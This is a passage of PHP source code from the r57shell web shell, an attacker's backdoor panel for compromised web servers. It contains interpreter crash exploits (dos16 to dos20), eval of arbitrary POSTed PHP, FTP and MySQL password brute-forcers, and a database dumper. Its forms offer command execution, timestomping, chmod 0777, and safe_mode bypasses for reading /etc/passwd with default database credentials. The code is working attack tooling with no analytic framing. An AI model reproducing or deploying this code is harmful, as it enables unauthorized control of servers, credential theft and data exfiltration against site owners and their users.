  5618. $str1 = "";for($i=0;$i <64;$i++){$str1 .= toUTF(977);}
  5619.  
  5620. @htmlentities($str1,ENT_NOQUOTES,"UTF-8");
  5621.  
  5622. break;
  5623.  
  5624. case 'dos16':
  5625.  
  5626. $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r,$e);
  5627.  
  5628. for ($i=0;$i<1000;$i++) $arr[$i]=array(array(""));
  5629.  
  5630. unset($arr[600]);@zip_entry_read($e,-1);unset($arr[601]);
  5631.  
  5632. break;
  5633.  
  5634. case 'dos17':
  5635.  
  5636. $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";
  5637.  
  5638. $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
  5639.  
  5640. $x = "AQ                                                                        ";
  5641.  
  5642. unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);
  5643.  
  5644. break;
  5645.  
  5646. case 'dos18':
  5647.  
  5648. $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY,0600);
  5649.  
  5650. if (!@msg_send ($msg_id,1,'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH',false,true,$msg_err))
  5651.  
  5652. echo "Msg not sent because $msg_err\n";
  5653.  
  5654. if (@msg_receive ($msg_id,1,$msg_type,0xffffffff,$_SESSION,false,0,$msg_error)) {
  5655.  
  5656. echo "$msg\n";
  5657.  
  5658. }else {echo "Received $msg_error fetching message\n";break;}
  5659.  
  5660. @msg_remove_queue ($msg_id);
  5661.  
  5662. break;
  5663.  
  5664. case 'dos19':
  5665.  
  5666. $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd";@fopen($url,"r");
  5667.  
  5668. break;
  5669.  
  5670. case 'dos20':
  5671.  
  5672. $hashtable = str_repeat("A",39);
  5673.  
  5674. $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);
  5675.  
  5676. $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);
  5677.  
  5678. $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
  5679.  
  5680. for ($i=0;$i<65535;$i++) {$str .= 'i:0;R:2;';}
  5681.  
  5682. $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';
  5683.  
  5684. @unserialize($str);
  5685.  
  5686. break;
  5687.  
  5688. }
  5689.  
  5690. if ($_POST['cmd']=="php_eval"){
  5691.  
  5692. $eval = @str_replace("<?","",$_POST['php_eval']);
  5693.  
  5694. $eval = @str_replace("?>","",$eval);
  5695.  
  5696. @eval($eval);}
  5697.  
  5698. if ($_POST['cmd']=="ftp_brute")
  5699.  
  5700. {
  5701.  
  5702. $suc = 0;
  5703.  
  5704. if($_POST['brute_method']=='passwd'){
  5705.  
  5706. foreach($users as $user)
  5707.  
  5708. {
  5709.  
  5710. $connection = @ftp_connect($ftp_server,$ftp_port,10);
  5711.  
  5712. if(@ftp_login($connection,$user,$user)) {echo "[+] $user:$user - success\r\n";$suc++;}
  5713.  
  5714. else if(isset($_POST['reverse'])) {if(@ftp_login($connection,$user,strrev($user))) {echo "[+] $user:".strrev($user)." - success\r\n";$suc++;}}
  5715.  
  5716. @ftp_close($connection);
  5717.  
  5718. }
  5719.  
  5720. }else if(($_POST['brute_method']=='dic') &&isset($_POST['ftp_login'])){
  5721.  
  5722. foreach($users as $user)
  5723.  
  5724. {
  5725.  
  5726. $connection = @ftp_connect($ftp_server,$ftp_port,10);
  5727.  
  5728. if(@ftp_login($connection,$_POST['ftp_login'],$user)) {echo "[+] ".$_POST['ftp_login'].":$user - success\r\n";$suc++;}
  5729.  
  5730. @ftp_close($connection);
  5731.  
  5732. }
  5733.  
  5734. }
  5735.  
  5736. echo "\r\n-------------------------------------\r\n";
  5737.  
  5738. $count = count($users);
  5739.  
  5740. if(isset($_POST['reverse']) &&($_POST['brute_method']=='passwd')) {$count *= 2;}
  5741.  
  5742. echo $lang[$language.'_text97'].$count."\r\n";
  5743.  
  5744. echo $lang[$language.'_text98'].$suc."\r\n";
  5745.  
  5746. }
  5747.  
  5748. if ($_POST['cmd']=="db_brute")
  5749.  
  5750. {
  5751.  
  5752. $suc = 0;
  5753.  
  5754. if($_POST['brute_method']=='passwd'){
  5755.  
  5756. foreach($users as $user)
  5757.  
  5758. {
  5759.  
  5760. $sql = new my_sql();
  5761.  
  5762. $sql->db   = $_POST['db'];
  5763.  
  5764. $sql->host = $_POST['db_server'];
  5765.  
  5766. $sql->port = $_POST['db_port'];
  5767.  
  5768. $sql->user = $user;
  5769.  
  5770. $sql->pass = $user;
  5771.  
  5772. if($sql->connect()) {echo "[+] $user:$user - success\r\n";$suc++;}
  5773.  
  5774. }
  5775.  
  5776. if(isset($_POST['reverse']))
  5777.  
  5778. {
  5779.  
  5780. foreach($users as $user)
  5781.  
  5782. {
  5783.  
  5784. $sql = new my_sql();
  5785.  
  5786. $sql->db   = $_POST['db'];
  5787.  
  5788. $sql->host = $_POST['db_server'];
  5789.  
  5790. $sql->port = $_POST['db_port'];
  5791.  
  5792. $sql->user = $user;
  5793.  
  5794. $sql->pass = strrev($user);
  5795.  
  5796. if($sql->connect()) {echo "[+] $user:".strrev($user)." - success\r\n";$suc++;}
  5797.  
  5798. }
  5799.  
  5800. }
  5801.  
  5802. }else if(($_POST['brute_method']=='dic') &&isset($_POST['mysql_l'])){
  5803.  
  5804. foreach($users as $user)
  5805.  
  5806. {
  5807.  
  5808. $sql = new my_sql();
  5809.  
  5810. $sql->db   = $_POST['db'];
  5811.  
  5812. $sql->host = $_POST['db_server'];
  5813.  
  5814. $sql->port = $_POST['db_port'];
  5815.  
  5816. $sql->user = $_POST['mysql_l'];
  5817.  
  5818. $sql->pass = $user;
  5819.  
  5820. if($sql->connect()) {echo "[+] ".$_POST['mysql_l'].":$user - success\r\n";$suc++;}
  5821.  
  5822. }
  5823.  
  5824. }
  5825.  
  5826. echo "\r\n-------------------------------------\r\n";
  5827.  
  5828. $count = count($users);
  5829.  
  5830. if(isset($_POST['reverse']) &&($_POST['brute_method']=='passwd')) {$count *= 2;}
  5831.  
  5832. echo $lang[$language.'_text97'].$count."\r\n";
  5833.  
  5834. echo $lang[$language.'_text98'].$suc."\r\n";
  5835.  
  5836. }
  5837.  
  5838. if ($_POST['cmd']=="mysql_dump")
  5839.  
  5840. {
  5841.  
  5842. if(isset($_POST['dif'])) {$fp = @fopen($_POST['dif_name'],"w");}
  5843.  
  5844. $sql = new my_sql();
  5845.  
  5846. $sql->db   = $_POST['db'];
  5847.  
  5848. $sql->host = $_POST['db_server'];
  5849.  
  5850. $sql->port = $_POST['db_port'];
  5851.  
  5852. $sql->user = $_POST['mysql_l'];
  5853.  
  5854. $sql->pass = $_POST['mysql_p'];
  5855.  
  5856. $sql->base = $_POST['mysql_db'];
  5857.  
  5858. if(!$sql->connect()) {echo "[-] ERROR! Can't connect to SQL server";}
  5859.  
  5860. else if(!$sql->select_db()) {echo "[-] ERROR! Can't select database";}
  5861.  
  5862. else if(!$sql->dump($_POST['mysql_tbl'])) {echo "[-] ERROR! Can't create dump";}
  5863.  
  5864. else {
  5865.  
  5866. if(empty($_POST['dif'])) {foreach($sql->dump as $v) echo $v."\r\n";}
  5867.  
  5868. else if($fp ||@function_exists('file_put_contents')){foreach($sql->dump as $v){@fwrite($fp,$v."\r\n") or @fputs($fp,$v."\r\n") or @file_put_contents($_POST['dif_name'],$v."\r\n");}}
  5869.  
  5870. else {echo "[-] ERROR! Can't write in dump file";}
  5871.  
  5872. }
  5873.  
  5874. }
  5875.  
  5876. echo "</textarea></div>";
  5877.  
  5878. echo "</b>";
  5879.  
  5880. echo "</td></tr></table>";
  5881.  
  5882. echo "<table width=100% cellpadding=0 cellspacing=0>";
  5883.  
  5884. function div_title($title,$id)
  5885.  
  5886. {
  5887.  
  5888. return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
  5889.  
  5890. }
  5891.  
  5892. function div($id)
  5893.  
  5894. {
  5895.  
  5896. if(isset($_COOKIE[$id]) &&($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">';
  5897.  
  5898. $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38');
  5899.  
  5900. if(empty($_COOKIE[$id]) &&@in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">';
  5901.  
  5902. return '<div id="'.$id.'">';
  5903.  
  5904. }
  5905.  
  5906. if(!$safe_mode){
  5907.  
  5908. echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
  5909.  
  5910. echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
  5911.  
  5912. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
  5913.  
  5914. echo $te.'</div>'.$table_end1.$fe;
  5915.  
  5916. }
  5917.  
  5918. else{
  5919.  
  5920. echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
  5921.  
  5922. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
  5923.  
  5924. echo $te.'</div>'.$table_end1.$fe;
  5925.  
  5926. }
  5927.  
  5928. echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
  5929.  
  5930. echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
  5931.  
  5932. echo $te.'</div>'.$table_end1.$fe;
  5933.  
  5934. if($safe_mode ||$open_basedir){
  5935.  
  5936. echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
  5937.  
  5938. echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
  5939.  
  5940. echo $te.'</div>'.$table_end1.$fe;
  5941.  
  5942. }
  5943.  
  5944. if($unix &&@function_exists('touch')){
  5945.  
  5946. echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;
  5947.  
  5948. echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($dir."/r57shell.php")))
  5949.  
  5950. .ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>"
  5951.  
  5952. .ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));
  5953.  
  5954. echo sr(15,"<b> or set  Day".$arrow."</b>",
  5955.  
  5956. '
  5957.  
  5958. <select name="day" size="1">
  5959.  
  5960. <option value="01">1</option>
  5961.  
  5962. <option value="02">2</option>
  5963.  
  5964. <option value="03">3</option>
  5965.  
  5966. <option value="04">4</option>
  5967.  
  5968. <option value="05">5</option>
  5969.  
  5970. <option value="06">6</option>
  5971.  
  5972. <option value="07">7</option>
  5973.  
  5974. <option value="08">8</option>
  5975.  
  5976. <option value="09">9</option>
  5977.  
  5978. <option value="10">10</option>
  5979.  
  5980. <option value="11">11</option>
  5981.  
  5982. <option value="12">12</option>
  5983.  
  5984. <option value="13">13</option>
  5985.  
  5986. <option value="14">14</option>
  5987.  
  5988. <option value="15">15</option>
  5989.  
  5990. <option value="16">16</option>
  5991.  
  5992. <option value="17">17</option>
  5993.  
  5994. <option value="18">18</option>
  5995.  
  5996. <option value="19">19</option>
  5997.  
  5998. <option value="20">20</option>
  5999.  
  6000. <option value="21">21</option>
  6001.  
  6002. <option value="22">22</option>
  6003.  
  6004. <option value="23">23</option>
  6005.  
  6006. <option value="24">24</option>
  6007.  
  6008. <option value="25">25</option>
  6009.  
  6010. <option value="26">26</option>
  6011.  
  6012. <option value="27">27</option>
  6013.  
  6014. <option value="28">28</option>
  6015.  
  6016. <option value="29">29</option>
  6017.  
  6018. <option value="30">30</option>
  6019.  
  6020. <option value="31">31</option>
  6021.  
  6022. </select>'
  6023.  
  6024. .ws(4)."<b>Month".$arrow."</b>"
  6025.  
  6026. .'
  6027.  
  6028. <select name="month" size="1">
  6029.  
  6030. <option value="January">January</option>
  6031.  
  6032. <option value="February">February</option>
  6033.  
  6034. <option value="March">March</option>
  6035.  
  6036. <option value="April">April</option>
  6037.  
  6038. <option value="May">May</option>
  6039.  
  6040. <option value="June">June</option>
  6041.  
  6042. <option value="July">July</option>
  6043.  
  6044. <option value="August">August</option>
  6045.  
  6046. <option value="September">September</option>
  6047.  
  6048. <option value="October">October</option>
  6049.  
  6050. <option value="November">November</option>
  6051.  
  6052. <option value="December">December</option>
  6053.  
  6054. </select>'
  6055.  
  6056. .ws(4)."<b>Year".$arrow."</b>"
  6057.  
  6058. .'
  6059.  
  6060. <select name="year" size="1">
  6061.  
  6062. <option value="1998">1998</option>
  6063.  
  6064. <option value="1999">1999</option>
  6065.  
  6066. <option value="2000">2000</option>
  6067.  
  6068. <option value="2001">2001</option>
  6069.  
  6070. <option value="2002">2002</option>
  6071.  
  6072. <option value="2003">2003</option>
  6073.  
  6074. <option value="2004">2004</option>
  6075.  
  6076. <option value="2005">2005</option>
  6077.  
  6078. <option value="2006">2006</option>
  6079.  
  6080. <option value="2006">2007</option>
  6081.  
  6082. <option value="2006">2008</option>
  6083.  
  6084. <option value="2006">2009</option>
  6085.  
  6086. <option value="2006">2010</option>
  6087.  
  6088. </select>'
  6089.  
  6090. .ws(4)."<b>Hour".$arrow."</b>"
  6091.  
  6092. .'
  6093.  
  6094. <select name="chasi" size="1">
  6095.  
  6096. <option value="01">01</option>
  6097.  
  6098. <option value="02">02</option>
  6099.  
  6100. <option value="03">03</option>
  6101.  
  6102. <option value="04">04</option>
  6103.  
  6104. <option value="05">05</option>
  6105.  
  6106. <option value="06">06</option>
  6107.  
  6108. <option value="07">07</option>
  6109.  
  6110. <option value="08">08</option>
  6111.  
  6112. <option value="09">09</option>
  6113.  
  6114. <option value="10">10</option>
  6115.  
  6116. <option value="11">11</option>
  6117.  
  6118. <option value="12">12</option>
  6119.  
  6120. <option value="13">13</option>
  6121.  
  6122. <option value="14">14</option>
  6123.  
  6124. <option value="15">15</option>
  6125.  
  6126. <option value="16">16</option>
  6127.  
  6128. <option value="17">17</option>
  6129.  
  6130. <option value="18">18</option>
  6131.  
  6132. <option value="19">19</option>
  6133.  
  6134. <option value="20">20</option>
  6135.  
  6136. <option value="21">21</option>
  6137.  
  6138. <option value="22">22</option>
  6139.  
  6140. <option value="23">23</option>
  6141.  
  6142. <option value="24">24</option>
  6143.  
  6144. </select>'
  6145.  
  6146. .ws(4)."<b>Minute".$arrow."</b>"
  6147.  
  6148. .'
  6149.  
  6150. <select name="minutes" size="1">
  6151.  
  6152. <option value="01">1</option>
  6153.  
  6154. <option value="02">2</option>
  6155.  
  6156. <option value="03">3</option>
  6157.  
  6158. <option value="04">4</option>
  6159.  
  6160. <option value="05">5</option>
  6161.  
  6162. <option value="06">6</option>
  6163.  
  6164. <option value="07">7</option>
  6165.  
  6166. <option value="08">8</option>
  6167.  
  6168. <option value="09">9</option>
  6169.  
  6170. <option value="10">10</option>
  6171.  
  6172. <option value="11">11</option>
  6173.  
  6174. <option value="12">12</option>
  6175.  
  6176. <option value="13">13</option>
  6177.  
  6178. <option value="14">14</option>
  6179.  
  6180. <option value="15">15</option>
  6181.  
  6182. <option value="16">16</option>
  6183.  
  6184. <option value="17">17</option>
  6185.  
  6186. <option value="18">18</option>
  6187.  
  6188. <option value="19">19</option>
  6189.  
  6190. <option value="20">20</option>
  6191.  
  6192. <option value="21">21</option>
  6193.  
  6194. <option value="22">22</option>
  6195.  
  6196. <option value="23">23</option>
  6197.  
  6198. <option value="24">24</option>
  6199.  
  6200. <option value="25">25</option>
  6201.  
  6202. <option value="26">26</option>
  6203.  
  6204. <option value="27">27</option>
  6205.  
  6206. <option value="28">28</option>
  6207.  
  6208. <option value="29">29</option>
  6209.  
  6210. <option value="30">30</option>
  6211.  
  6212. <option value="31">31</option>
  6213.  
  6214. <option value="32">32</option>
  6215.  
  6216. <option value="33">33</option>
  6217.  
  6218. <option value="34">34</option>
  6219.  
  6220. <option value="35">35</option>
  6221.  
  6222. <option value="36">36</option>
  6223.  
  6224. <option value="37">37</option>
  6225.  
  6226. <option value="38">38</option>
  6227.  
  6228. <option value="39">39</option>
  6229.  
  6230. <option value="40">40</option>
  6231.  
  6232. <option value="41">41</option>
  6233.  
  6234. <option value="42">42</option>
  6235.  
  6236. <option value="43">43</option>
  6237.  
  6238. <option value="44">44</option>
  6239.  
  6240. <option value="45">45</option>
  6241.  
  6242. <option value="46">46</option>
  6243.  
  6244. <option value="47">47</option>
  6245.  
  6246. <option value="48">48</option>
  6247.  
  6248. <option value="49">49</option>
  6249.  
  6250. <option value="50">50</option>
  6251.  
  6252. <option value="51">51</option>
  6253.  
  6254. <option value="52">52</option>
  6255.  
  6256. <option value="53">53</option>
  6257.  
  6258. <option value="54">54</option>
  6259.  
  6260. <option value="55">55</option>
  6261.  
  6262. <option value="56">56</option>
  6263.  
  6264. <option value="57">57</option>
  6265.  
  6266. <option value="58">58</option>
  6267.  
  6268. <option value="59">59</option>
  6269.  
  6270. </select>'
  6271.  
  6272. .ws(4)."<b>Second".$arrow."</b>"
  6273.  
  6274. .'
  6275.  
  6276. <select name="second" size="1">
  6277.  
  6278. <option value="01">1</option>
  6279.  
  6280. <option value="02">2</option>
  6281.  
  6282. <option value="03">3</option>
  6283.  
  6284. <option value="04">4</option>
  6285.  
  6286. <option value="05">5</option>
  6287.  
  6288. <option value="06">6</option>
  6289.  
  6290. <option value="07">7</option>
  6291.  
  6292. <option value="08">8</option>
  6293.  
  6294. <option value="09">9</option>
  6295.  
  6296. <option value="10">10</option>
  6297.  
  6298. <option value="11">11</option>
  6299.  
  6300. <option value="12">12</option>
  6301.  
  6302. <option value="13">13</option>
  6303.  
  6304. <option value="14">14</option>
  6305.  
  6306. <option value="15">15</option>
  6307.  
  6308. <option value="16">16</option>
  6309.  
  6310. <option value="17">17</option>
  6311.  
  6312. <option value="18">18</option>
  6313.  
  6314. <option value="19">19</option>
  6315.  
  6316. <option value="20">20</option>
  6317.  
  6318. <option value="21">21</option>
  6319.  
  6320. <option value="22">22</option>
  6321.  
  6322. <option value="23">23</option>
  6323.  
  6324. <option value="24">24</option>
  6325.  
  6326. <option value="25">25</option>
  6327.  
  6328. <option value="26">26</option>
  6329.  
  6330. <option value="27">27</option>
  6331.  
  6332. <option value="28">28</option>
  6333.  
  6334. <option value="29">29</option>
  6335.  
  6336. <option value="30">30</option>
  6337.  
  6338. <option value="31">31</option>
  6339.  
  6340. <option value="32">32</option>
  6341.  
  6342. <option value="33">33</option>
  6343.  
  6344. <option value="34">34</option>
  6345.  
  6346. <option value="35">35</option>
  6347.  
  6348. <option value="36">36</option>
  6349.  
  6350. <option value="37">37</option>
  6351.  
  6352. <option value="38">38</option>
  6353.  
  6354. <option value="39">39</option>
  6355.  
  6356. <option value="40">40</option>
  6357.  
  6358. <option value="41">41</option>
  6359.  
  6360. <option value="42">42</option>
  6361.  
  6362. <option value="43">43</option>
  6363.  
  6364. <option value="44">44</option>
  6365.  
  6366. <option value="45">45</option>
  6367.  
  6368. <option value="46">46</option>
  6369.  
  6370. <option value="47">47</option>
  6371.  
  6372. <option value="48">48</option>
  6373.  
  6374. <option value="49">49</option>
  6375.  
  6376. <option value="50">50</option>
  6377.  
  6378. <option value="51">51</option>
  6379.  
  6380. <option value="52">52</option>
  6381.  
  6382. <option value="53">53</option>
  6383.  
  6384. <option value="54">54</option>
  6385.  
  6386. <option value="55">55</option>
  6387.  
  6388. <option value="56">56</option>
  6389.  
  6390. <option value="57">57</option>
  6391.  
  6392. <option value="58">58</option>
  6393.  
  6394. <option value="59">59</option>
  6395.  
  6396. </select>'
  6397.  
  6398. .in('hidden','cmd',0,'touch')
  6399.  
  6400. .in('hidden','dir',0,$dir)
  6401.  
  6402. .ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
  6403.  
  6404. echo $te.'</div>'.$table_end1.$fe;
  6405.  
  6406. }
  6407.  
  6408. $select='';
  6409.  
  6410. if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";}
  6411.  
  6412. if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";}
  6413.  
  6414. if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";}
  6415.  
  6416. if($unix &&$select){
  6417.  
  6418. echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;
  6419.  
  6420. echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($dir."/r57shell.php"))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
  6421.  
  6422. echo $te.'</div>'.$table_end1.$fe;
  6423.  
  6424. }
  6425.  
  6426. if(!$safe_mode){
  6427.  
  6428. $aliases2 = '';
  6429.  
  6430. foreach ($aliases as $alias_name=>$alias_cmd)
  6431.  
  6432. {
  6433.  
  6434. $aliases2 .= "<option>$alias_name</option>";
  6435.  
  6436. }
  6437.  
  6438. echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts;
  6439.  
  6440. echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
  6441.  
  6442. echo $te.'</div>'.$table_end1.$fe;
  6443.  
  6444. }
  6445.  
  6446. echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts;
  6447.  
  6448. echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
  6449.  
  6450. echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
  6451.  
  6452. echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
  6453.  
  6454. echo $te.'</div>'.$table_end1.$fe;
  6455.  
  6456. if(!$safe_mode &&$unix){
  6457.  
  6458. echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;
  6459.  
  6460. echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
  6461.  
  6462. echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
  6463.  
  6464. echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
  6465.  
  6466. echo $te.'</div>'.$table_end1.$fe;
  6467.  
  6468. }
  6469.  
  6470. echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id10').$table_up2.$font;
  6471.  
  6472. echo "<div align=center>".div('id10')."<textarea name=php_eval cols=100 rows=10>";
  6473.  
  6474. echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));
  6475.  
  6476. echo "</textarea>";
  6477.  
  6478. echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
  6479.  
  6480. echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
  6481.  
  6482. echo "</div></div></font>";
  6483.  
  6484. echo $table_end1.$fe;
  6485.  
  6486. if($safe_mode ||$open_basedir)
  6487.  
  6488. {
  6489.  
  6490. echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
  6491.  
  6492. echo "<table class=table1 width=100% align=center>";
  6493.  
  6494. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  6495.  
  6496. echo $te.'</div>'.$table_end1.$fe;
  6497.  
  6498. }
  6499.  
  6500. if(($safe_mode ||$open_basedir) &&$curl_on &&@version_compare(@phpversion(),"5.2.0")<=0)
  6501.  
  6502. {
  6503.  
  6504. echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;
  6505.  
  6506. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  6507.  
  6508. echo $te.'</div>'.$table_end1.$fe;
  6509.  
  6510. }
  6511.  
  6512. if(($safe_mode ||$open_basedir) &&$mysql_on)
  6513.  
  6514. {
  6515.  
  6516. echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id13').$table_up2.div('id13').$ts;
  6517.  
  6518. echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
  6519.  
  6520. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  6521.  
  6522. echo $te.'</div>'.$table_end1.$fe;
  6523.  
  6524. }
  6525.  
  6526. if(($safe_mode ||$open_basedir) &&$mssql_on)
  6527.  
  6528. {
  6529.  
  6530. echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;
  6531.  
  6532. echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
  6533.  
  6534. echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  6535.  
  6536. echo $te.'</div>'.$table_end1.$fe;
  6537.  
  6538. }
  6539.  
  6540. if(($safe_mode ||$open_basedir) &&$unix &&@function_exists('mb_send_mail') &&@version_compare(@phpversion(),"5.2.0")<=0){
  6541.  
  6542. echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
  6543.  
